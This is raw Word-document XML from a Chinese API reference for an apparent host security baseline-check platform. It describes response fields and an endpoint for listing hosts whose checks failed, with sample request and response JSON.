            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B2F6DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E68F503" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0910D5E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65EAABA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76C7EA00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2770B04E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B8C6D66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654DBEE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A10CB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1197C7FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29285743" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA85E4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5535F228" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60ED4FEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E01E7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EFE5243" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA6BEA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41BA7D15" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2044F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70017F1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0476196F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查明细</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13EB4119" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A5D6C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1BAE27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F4EB15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B34EE05" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432D25F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36162BF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA10477" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E416D04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789C16C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1722856C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22652B78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46C9BCCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0004CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC4F7DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="756535B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>引用信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F1CC840" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445C6407" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="277647CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAD1C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12407735" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E3B03CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>remedDes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390DFDC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CCC222" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E29F276" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="_Toc115166254"/>
      <w:bookmarkStart w:id="364" w:name="查询检失败主机"/>
      <w:bookmarkEnd w:id="362"/>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>检失败</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
    </w:p>
    <w:p w14:paraId="3A477A46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AAE5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/spec/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>failedHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777004F1"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173"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1292"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B7F856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F7A859E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A64BFD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461F57FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06A203DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="262DFAB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF72135" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC1BDFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D168ADB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107A887B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47D298B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7538BF79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7BF6C46A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D9BDD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3053AEA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155F16B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70BA6ACE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44DA0C38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C13A7F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191FB6F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AA05B92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5B7E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59f6cddf7d761b2828add61b",  //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "xxx",  //主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "xxx",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": [1, 2]  //失败原因</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCAD72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626E5C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "407c1dd87b1d7771",  //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "192.168.50.131",  //主机IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "192.168.50.131",  //内网IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : null,  //外网IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname" : "ZYLI-WIN8SERVER",  //主机名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group":0,//业务组</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "", //备注</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [], //标签</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code" : 1, //失败码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "description" : "主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线",  //描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49C468"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300"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="967"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B84E5D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2009DB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CAEC6A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5807BA5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7069DC21" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74722618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A2C6160" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73A0870C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3911F6A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282ED919" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="284B5858" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D88EDA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
